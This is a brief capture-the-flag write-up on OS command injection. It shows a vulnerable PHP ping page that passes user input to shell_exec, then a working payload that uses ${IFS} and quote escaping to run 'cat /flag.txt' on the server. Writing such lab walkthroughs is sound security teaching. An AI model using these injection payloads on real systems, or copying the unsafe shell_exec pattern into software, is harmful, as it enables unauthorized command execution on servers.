ping me

OS Command Injection.

1 min read

Table of Contents

To start the challenge, we are provided with the source code for index.php which contained the following:

<?php
    if (isset($_GET['ip'])) {
        $ip = $_GET['ip'];
        if (strpos($ip, " ")) {
            die("Spaces not allowed in the IP!");
        }
        $ip = str_replace("'", "\\'", $ip);
        $cmd = "ping -c1 -t1 '$ip'";
        if ($_GET['debug']) { echo "$cmd\n"; }
        echo shell_exec($cmd);
        die();
    }
?>
<html>
<body>
<form method="GET">
IP to ping: <input type="text" placeholder="IP" name="ip" />
<input type="submit" value="Ping" />
</form>
</body>
</html>

A couple things to note from looking at the source:

  1. We are limited by the if statement checking that there are no spaces in our parameter.
  2. Quotes (') are being escaped.
  3. The value of the parameter ip provided is being directly injected into the cmd variable which is then executed on the server with shell_exec.

To get around the first limitation, I referenced PayloadsAllTheThings, and used ${IFS} which when executed on the server, would resolve to a space. I then had to close the previous command, so I added the following to the start of the payload - ';. From there I built the final payload:

';cat${IFS}/flag.txt;\'

The final encoded payload was as follows:

/?debug=1&ip=%27;cat${IFS}/flag.txt;\%27
Image

As shown - by using the debug parameter, the command was printed, and the cat /flag.txt command was executed on the server.